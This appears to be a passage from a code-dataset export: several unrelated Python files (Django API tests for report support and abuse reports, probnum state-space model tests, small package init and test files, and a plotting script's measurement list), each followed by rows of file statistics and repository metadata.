response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 1)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO_COMMENT)
params = {
'reportGuid': report1.guid,
'message': ' ',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 1)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO_COMMENT)
params = {
'reportGuid': report1.guid,
'message': 'Hello World 2',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
params = {
'reportGuid': report1.guid,
'message': '',
'isLike': False,
'isMeToo': False
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
params = {
'reportGuid': report1.guid,
'message': '',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
report2 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report2.guid,
'message': '',
'isLike': True,
'isMeToo': False
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 3)
self.assertEqual(notifications[0].type, SUPPORT_LIKE)
report3 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report3.guid,
'message': '',
'isLike': False,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 4)
self.assertEqual(notifications[0].type, SUPPORT_ME_TOO)
report4 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report4.guid,
'message': '',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 5)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO)
class TestApiReportReportAbuse(APITestCase):
    """Cover the report-abuse endpoints: creating an abuse report,
    listing abuses from multiple users, and the rejection paths
    (missing reason, anonymous user, missing token)."""

    def setUp(self):
        # The abuse flow needs a report type with the fixed id 0 to exist.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('clear_index', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.krystal = factory.create_user(is_anonymous=True)
        self.authority = factory.create_authority()
        for member in (self.taeyeon, self.jessica, self.yoona, self.krystal):
            self.authority.users.add(member)
        self.type = factory.create_report_type(authority=self.authority)
        self.area = factory.create_administration_area(authority=self.authority)
        self.report1 = factory.create_report(
            created_by=self.taeyeon, type=self.type, administration_area=self.area)
        self.report2 = factory.create_report(
            created_by=self.jessica, type=self.type, administration_area=self.area)

    def test_post_create_report_report_abuse(self):
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        response = self.client.post(
            reverse('report-reportAbuse', args=[self.report2.id]),
            {"reason": "No reason"},
        )
        self.assertEqual(response.status_code, 201)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportId'], self.report2.id)
        self.assertEqual(response_json['reason'], 'No reason')
        # The newest ReportAbuse row must record report, reason and author.
        report_abuse = ReportAbuse.objects.latest('id')
        self.assertEqual(report_abuse.report, self.report2)
        self.assertEqual(report_abuse.reason, 'No reason')
        self.assertEqual(report_abuse.created_by, self.taeyeon)

    def test_post_create_report_report_abuse_with_multi_users(self):
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        response = self.client.post(
            reverse('report-reportAbuse', args=[self.report1.id]),
            {"reason": "No reason, It's me"},
        )
        self.assertEqual(response.status_code, 201)
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
        response = self.client.post(
            reverse('report-reportAbuse', args=[self.report1.id]),
            {"reason": "No reason, :P"},
        )
        self.assertEqual(response.status_code, 201)
        # Both abuse entries are visible through the listing endpoint.
        response = self.client.get(reverse('report-reportAbuses', args=[self.report1.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)

    def test_post_create_report_report_abuse_without_reason(self):
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        response = self.client.post(reverse('report-reportAbuse', args=[self.report2.id]))
        self.assertEqual(response.status_code, 400)

    def test_post_api_report_report_abuse_wih_anonymous_by_report(self):
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.krystal.auth_token.key)
        response = self.client.post(
            reverse('report-reportAbuse', args=[self.report1.id]),
            {"reason": "No reason, :P"},
        )
        self.assertEqual(response.status_code, 400)

    def test_post_api_report_report_abuse_no_token(self):
        response = self.client.post(
            reverse('report-reportAbuse', args=[self.report1.id]),
            {"reason": "No reason, :P"},
        )
        self.assertEqual(response.status_code, 401)
| 45.642505
| 140
| 0.670311
| 25,711
| 222,279
| 5.605733
| 0.020225
| 0.1252
| 0.083939
| 0.051329
| 0.97122
| 0.961042
| 0.949358
| 0.939179
| 0.934344
| 0.925553
| 0
| 0.029833
| 0.203011
| 222,279
| 4,869
| 141
| 45.651879
| 0.783623
| 0.013236
| 0
| 0.834479
| 0
| 0.002091
| 0.102415
| 0.009616
| 0
| 0
| 0
| 0
| 0.312519
| 1
| 0.068121
| false
| 0.000598
| 0.006573
| 0.002689
| 0.08545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9cd462ea77ed2bb613903e28e14369c07888c81
| 5,928
|
py
|
Python
|
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
"""
"""
import unittest
import numpy as np
from probnum.filtsmooth.statespace.discrete import discretegaussianmodel
TEST_NDIM = 4
class TestDiscreteGaussianModel(unittest.TestCase):
    """Shape and interface tests for the nonlinear discrete Gaussian model."""

    def setUp(self):
        """Build a model with a random linear dynamics map and an SPD diffusion."""
        transition = np.random.rand(TEST_NDIM, TEST_NDIM)
        spd_matrix = transition @ transition.T + np.eye(TEST_NDIM)
        self.nl = discretegaussianmodel.DiscreteGaussianModel(
            lambda t, x: transition @ x, lambda t: spd_matrix
        )

    def test_dynamics(self):
        """The dynamics map a state vector to a vector of the same length."""
        state = np.random.rand(TEST_NDIM)
        out = self.nl.dynamics(0.0, state)
        self.assertEqual(out.ndim, 1)
        self.assertEqual(out.shape[0], TEST_NDIM)

    def test_diffusionmatrix(self):
        """The diffusion matrix is square of size TEST_NDIM."""
        diffusion = self.nl.diffusionmatrix(0.0)
        self.assertEqual(diffusion.ndim, 2)
        self.assertEqual(diffusion.shape[0], TEST_NDIM)
        self.assertEqual(diffusion.shape[1], TEST_NDIM)

    def test_jacobian(self):
        """A model built without a Jacobian callable raises NotImplementedError."""
        state = np.random.rand(TEST_NDIM)
        with self.assertRaises(NotImplementedError):
            self.nl.jacobian(0.0, state)

    def test_sample(self):
        """Sampling yields a state-sized vector."""
        state = np.random.rand(TEST_NDIM)
        draw = self.nl.sample(0.0, state)
        self.assertEqual(draw.ndim, 1)
        self.assertEqual(draw.shape[0], TEST_NDIM)

    def test_ndim(self):
        """The model reports the configured dimension."""
        self.assertEqual(self.nl.ndim, TEST_NDIM)

    def test_pdf(self):
        """Evaluating the transition density returns a scalar."""
        state = np.random.rand(TEST_NDIM)
        density = self.nl.pdf(state, 0.0, state)
        self.assertEqual(np.isscalar(density), True)
class TestLinear(unittest.TestCase):
    """Shape and interface tests for the linear discrete Gaussian model."""

    def setUp(self):
        """Build a linear model with random dynamics, force and SPD diffusion."""
        transition = np.random.rand(TEST_NDIM, TEST_NDIM)
        spd_matrix = transition @ transition.T + np.eye(TEST_NDIM)
        self.lin = discretegaussianmodel.DiscreteGaussianLinearModel(
            lambda t: transition, lambda t: np.random.rand(TEST_NDIM), lambda t: spd_matrix
        )

    def test_dynamics(self):
        """The dynamics map a state vector to a vector of the same length."""
        state = np.random.rand(TEST_NDIM)
        out = self.lin.dynamics(0.0, state)
        self.assertEqual(out.ndim, 1)
        self.assertEqual(out.shape[0], TEST_NDIM)

    def test_diffusionmatrix(self):
        """The diffusion matrix is square of size TEST_NDIM."""
        diffusion = self.lin.diffusionmatrix(0.0)
        self.assertEqual(diffusion.ndim, 2)
        self.assertEqual(diffusion.shape[0], TEST_NDIM)
        self.assertEqual(diffusion.shape[1], TEST_NDIM)

    def test_jacobian(self):
        """The Jacobian of a linear model is a square matrix."""
        state = np.random.rand(TEST_NDIM)
        jacobian = self.lin.jacobian(0.0, state)
        self.assertEqual(jacobian.ndim, 2)
        self.assertEqual(jacobian.shape[0], TEST_NDIM)
        self.assertEqual(jacobian.shape[1], TEST_NDIM)

    def test_dynamicsmatrix(self):
        """The dynamics matrix is square of size TEST_NDIM."""
        matrix = self.lin.dynamicsmatrix(0.0)
        self.assertEqual(matrix.ndim, 2)
        self.assertEqual(matrix.shape[0], TEST_NDIM)
        self.assertEqual(matrix.shape[1], TEST_NDIM)

    def test_force(self):
        """The force term is a vector of length TEST_NDIM."""
        force_vector = self.lin.force(0.0)
        self.assertEqual(force_vector.ndim, 1)
        self.assertEqual(force_vector.shape[0], TEST_NDIM)

    def test_sample(self):
        """Sampling yields a state-sized vector."""
        state = np.random.rand(TEST_NDIM)
        draw = self.lin.sample(0.0, state)
        self.assertEqual(draw.ndim, 1)
        self.assertEqual(draw.shape[0], TEST_NDIM)

    def test_ndim(self):
        """The model reports the configured dimension."""
        self.assertEqual(self.lin.ndim, TEST_NDIM)

    def test_pdf(self):
        """Evaluating the transition density returns a scalar."""
        state = np.random.rand(TEST_NDIM)
        density = self.lin.pdf(state, 0.0, state)
        self.assertEqual(np.isscalar(density), True)
class TestLTI(unittest.TestCase):
    """Shape and interface tests for the LTI discrete Gaussian model."""

    def setUp(self):
        """Build an LTI model from a random matrix, its first row as force,
        and an SPD diffusion matrix."""
        transition = np.random.rand(TEST_NDIM, TEST_NDIM)
        spd_matrix = transition @ transition.T + np.eye(TEST_NDIM)
        self.lti = discretegaussianmodel.DiscreteGaussianLTIModel(
            transition, transition[0], spd_matrix
        )

    def test_dynamics(self):
        """The dynamics map a state vector to a vector of the same length."""
        state = np.random.rand(TEST_NDIM)
        out = self.lti.dynamics(0.0, state)
        self.assertEqual(out.ndim, 1)
        self.assertEqual(out.shape[0], TEST_NDIM)

    def test_dynamicsmatrix(self):
        """The dynamics matrix is square of size TEST_NDIM."""
        # Draw kept to preserve the original global RNG stream; result unused.
        np.random.rand(TEST_NDIM)
        matrix = self.lti.dynamicsmatrix(0.0)
        self.assertEqual(matrix.ndim, 2)
        self.assertEqual(matrix.shape[0], TEST_NDIM)
        self.assertEqual(matrix.shape[1], TEST_NDIM)

    def test_diffusionmatrix(self):
        """The diffusion matrix is square of size TEST_NDIM."""
        diffusion = self.lti.diffusionmatrix(0.0)
        self.assertEqual(diffusion.ndim, 2)
        self.assertEqual(diffusion.shape[0], TEST_NDIM)
        self.assertEqual(diffusion.shape[1], TEST_NDIM)

    def test_jacobian(self):
        """The Jacobian of an LTI model is a square matrix."""
        state = np.random.rand(TEST_NDIM)
        jacobian = self.lti.jacobian(0.0, state)
        self.assertEqual(jacobian.ndim, 2)
        self.assertEqual(jacobian.shape[0], TEST_NDIM)
        self.assertEqual(jacobian.shape[1], TEST_NDIM)

    def test_force(self):
        """The force term is a vector of length TEST_NDIM."""
        force_vector = self.lti.force(0.0)
        self.assertEqual(force_vector.ndim, 1)
        self.assertEqual(force_vector.shape[0], TEST_NDIM)

    def test_sample(self):
        """Sampling yields a state-sized vector."""
        state = np.random.rand(TEST_NDIM)
        draw = self.lti.sample(0.0, state)
        self.assertEqual(draw.ndim, 1)
        self.assertEqual(draw.shape[0], TEST_NDIM)

    def test_ndim(self):
        """The model reports the configured dimension."""
        self.assertEqual(self.lti.ndim, TEST_NDIM)

    def test_pdf(self):
        """Evaluating the transition density returns a scalar."""
        state = np.random.rand(TEST_NDIM)
        density = self.lti.pdf(state, 0.0, state)
        self.assertEqual(np.isscalar(density), True)
| 27.192661
| 85
| 0.578947
| 716
| 5,928
| 4.655028
| 0.083799
| 0.124812
| 0.059406
| 0.081008
| 0.860486
| 0.848785
| 0.839184
| 0.839184
| 0.821482
| 0.821482
| 0
| 0.018186
| 0.285762
| 5,928
| 217
| 86
| 27.317972
| 0.769013
| 0
| 0
| 0.682927
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.357724
| 1
| 0.203252
| false
| 0
| 0.02439
| 0
| 0.252033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a007b401c8e05e4c43cba162b029370e0c390db6
| 75
|
py
|
Python
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 16
|
2018-07-12T14:26:02.000Z
|
2022-02-24T12:10:00.000Z
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 751
|
2017-09-28T07:47:50.000Z
|
2022-03-31T12:08:25.000Z
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
vrk-kpa/opendata-ckan
|
8936e2d9e700b9e5534fe2a51eedc2d1ede8c10b
|
[
"MIT"
] | 6
|
2017-10-31T07:47:07.000Z
|
2021-10-06T07:09:07.000Z
|
def task_imports():
    """Return the module paths Celery should scan for task definitions."""
    # NOTE(review): the same module path is listed twice in the original;
    # presumably one entry was meant to be a different module — confirm
    # upstream before deduplicating (duplicates are preserved here).
    tasks_module = 'ckanext.ytp.tasks'
    return [tasks_module, tasks_module]
| 18.75
| 53
| 0.68
| 10
| 75
| 5
| 0.7
| 0.4
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 75
| 3
| 54
| 25
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0.5
| 1.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
a01681e0835259d3c759cdf45430f1f56f5b6762
| 150
|
py
|
Python
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | 5
|
2021-11-12T21:58:42.000Z
|
2021-12-25T11:40:27.000Z
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | 16
|
2021-11-15T17:52:54.000Z
|
2022-03-25T15:26:28.000Z
|
tests/test_get_id_by_query.py
|
monosans/pygismeteo
|
f6238ffd7811aefa3366b73c6c082395682b3d27
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from pygismeteo import Gismeteo
def test_get_id_by_query() -> None:
    """Resolving the query "Москва" must yield gismeteo city id 4368."""
    client = Gismeteo()
    city_id = client.get_id_by_query("Москва")
    assert city_id == 4368
| 21.428571
| 55
| 0.693333
| 22
| 150
| 4.409091
| 0.772727
| 0.103093
| 0.14433
| 0.247423
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03937
| 0.153333
| 150
| 6
| 56
| 25
| 0.724409
| 0.14
| 0
| 0
| 0
| 0
| 0.047244
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4e6bb1966f5fc0f8ad3e798d466f71a7d6a4d01f
| 167
|
py
|
Python
|
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | 2
|
2021-02-02T17:31:14.000Z
|
2021-02-17T21:33:18.000Z
|
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | null | null | null |
x_rand2/__init__.py
|
connor-makowski/x_rand
|
e9e6faae8c4f004aebcfea2b3483031695c7ed3d
|
[
"MIT"
] | null | null | null |
import sys

# Re-export the public API at package level.
# Python 3 needs the explicit package path; legacy Python 2 relied on
# implicit relative imports from inside the package.
# Fix: the original tested `== 3`, so any future major version (> 3)
# would silently import nothing; `>= 3` keeps behavior identical on
# Python 2 and 3 while covering later versions.
if sys.version_info[0] >= 3:
    from x_rand2.x_rand import x_rand, x_rand_admin
else:
    from x_rand2 import x_rand, x_rand_admin
| 27.833333
| 51
| 0.748503
| 34
| 167
| 3.352941
| 0.382353
| 0.219298
| 0.245614
| 0.263158
| 0.824561
| 0.824561
| 0.45614
| 0.45614
| 0
| 0
| 0
| 0.043165
| 0.167665
| 167
| 5
| 52
| 33.4
| 0.776978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4e76cdfc116a71e3363fd49a9efeb6f2b51ebbe8
| 76,672
|
py
|
Python
|
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | 6
|
2021-06-14T12:53:06.000Z
|
2021-11-12T01:14:43.000Z
|
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | null | null | null |
espeleo_planner/test/scripts/plot_neighbour_angle_std_histogram.py
|
ITVRoC/espeleo_planner
|
f29d01c09aba339a30a76d05e80641181172ec8a
|
[
"MIT"
] | 2
|
2021-09-17T06:58:23.000Z
|
2022-03-02T12:15:29.000Z
|
#! /usr/bin/python
import matplotlib.pyplot as plt
import numpy as np
measurements_mean_std = [
[14.580862047474623, 6.075320512048607],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[10.997665027116431, 5.122087565285087],
[9.083403326029671, 4.36430118910945],
[8.807800893220461, 3.5521659564820025],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[9.466254501175204, 3.8184797117274356],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[14.580862047474623, 6.075320512048607],
[8.807800893220461, 3.5521659564820025],
[8.537576561493351, 3.80529051679574],
[13.810979490746323, 5.502056760777586],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[12.080015421555425, 5.049617522440796],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[14.580862047474623, 6.075320512048607],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[12.184675001512177, 5.239194812480995],
[12.080015421555425, 5.049617522440796],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[14.580862047474623, 6.075320512048607],
[6.476501957957835, 4.8132321274246],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[12.184675001512177, 5.239194812480995],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[8.670163964741999, 4.633257877869705],
[6.3210685917865375, 4.3368878948732315],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[8.432597172058323, 5.273744677582166],
[9.083403326029671, 4.36430118910945],
[9.928680899438294, 6.035107559394114],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[9.359806276911984, 4.391696939018151],
[17.15034588213487, 6.013297305587326],
[17.40712445864718, 6.0786148727775835],
[14.580862047474623, 6.075320512048607],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[12.184675001512177, 5.239194812480995],
[9.928680899438294, 6.035107559394114],
[14.580862047474623, 6.075320512048607],
[8.537576561493351, 3.80529051679574],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[12.080015421555425, 5.049617522440796],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[11.587112662074224, 6.358617831738943],
[9.928680899438294, 6.035107559394114],
[6.476501957957835, 4.8132321274246],
[9.083403326029671, 4.36430118910945],
[11.508128595950659, 3.5851980362589004],
[8.807800893220461, 3.5521659564820025],
[9.359806276911984, 4.391696939018151],
[13.810979490746323, 5.502056760777586],
[12.184675001512177, 5.239194812480995],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[12.107676347618414, 3.5085731094097685],
[8.670163964741999, 4.633257877869705],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[8.870442861535144, 6.177832505416414],
[5.8339171963263325, 3.677542604399159],
[8.432597172058323, 5.273744677582166],
[6.476501957957835, 4.8132321274246],
[9.359806276911984, 4.391696939018151],
[7.852704754906792, 4.343768201209051],
[8.091186464752749, 6.136296389022805],
[6.365395218692758, 3.981690481898278],
[6.02640897943888, 3.916563880181475],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[5.8339171963263325, 3.677542604399159],
[8.432597172058323, 5.273744677582166],
[6.476501957957835, 4.8132321274246],
[8.091186464752749, 6.136296389022805],
[6.365395218692758, 3.981690481898278],
[12.080015421555425, 5.049617522440796],
[12.853507659807189, 5.785539998056296],
[8.870442861535144, 6.177832505416414],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[7.852704754906792, 4.343768201209051],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[6.365395218692758, 3.981690481898278],
[5.603685695983892, 3.2451075514789007],
[6.079090279988409, 4.148184844804541],
[7.176117324513632, 3.942691925460738],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[8.0310976897579, 4.565308046256245],
[6.3210685917865375, 4.3368878948732315],
[9.928680899438294, 6.035107559394114],
[8.870442861535144, 6.177832505416414],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[8.432597172058323, 5.273744677582166],
[11.587112662074224, 6.358617831738943],
[9.083403326029671, 4.36430118910945],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.02640897943888, 3.916563880181475],
[5.603685695983892, 3.2451075514789007],
[6.079090279988409, 4.148184844804541],
[5.8339171963263325, 3.677542604399159],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[8.670163964741999, 4.633257877869705],
[9.928680899438294, 6.035107559394114],
[11.508128595950659, 3.5851980362589004],
[8.537576561493351, 3.80529051679574],
[8.807800893220461, 3.5521659564820025],
[6.079090279988409, 4.148184844804541],
[6.476501957957835, 4.8132321274246],
[9.083403326029671, 4.36430118910945],
[9.359806276911984, 4.391696939018151],
[8.091186464752749, 6.136296389022805],
[12.107676347618414, 3.5085731094097685],
[5.665576843540502, 3.3322218039932925],
[6.3210685917865375, 4.3368878948732315],
[6.079090279988409, 4.148184844804541],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[6.883321149103081, 3.7013844629577264],
[6.365395218692758, 3.981690481898278],
[7.627730488281269, 3.536913242480221],
[5.8339171963263325, 3.677542604399159],
[5.665576843540502, 3.3322218039932925],
[6.02640897943888, 3.916563880181475],
[6.883321149103081, 3.7013844629577264],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[15.0144750900378, 3.0690458860312413],
[11.587112662074224, 6.358617831738943],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[6.365395218692758, 3.981690481898278],
[7.382275307401952, 3.514762773783933],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[8.0310976897579, 4.565308046256245],
[4.939032982959074, 2.8272859625441624],
[13.810979490746323, 5.502056760777586],
[17.40712445864718, 6.0786148727775835],
[12.184675001512177, 5.239194812480995],
[14.580862047474623, 6.075320512048607],
[14.230652017983934, 6.391535491200372],
[8.670163964741999, 4.633257877869705],
[6.079090279988409, 4.148184844804541],
[8.537576561493351, 3.80529051679574],
[11.508128595950659, 3.5851980362589004],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[12.107676347618414, 3.5085731094097685],
[9.359806276911984, 4.391696939018151],
[6.079090279988409, 4.148184844804541],
[11.508128595950659, 3.5851980362589004],
[6.476501957957835, 4.8132321274246],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[4.037928442939495, 2.247534391934304],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[6.03354502067699, 2.1318518082449667],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[10.814899075379794, 4.388065524750964],
[6.365395218692758, 3.981690481898278],
[7.627730488281269, 3.536913242480221],
[6.02640897943888, 3.916563880181475],
[8.0310976897579, 4.565308046256245],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[7.466702255730219, 4.246506577865299],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[6.365395218692758, 3.981690481898278],
[4.939032982959074, 2.8272859625441624],
[9.928680899438294, 6.035107559394114],
[11.587112662074224, 6.358617831738943],
[12.080015421555425, 5.049617522440796],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[9.928680899438294, 6.035107559394114],
[6.079090279988409, 4.148184844804541],
[8.432597172058323, 5.273744677582166],
[11.587112662074224, 6.358617831738943],
[6.476501957957835, 4.8132321274246],
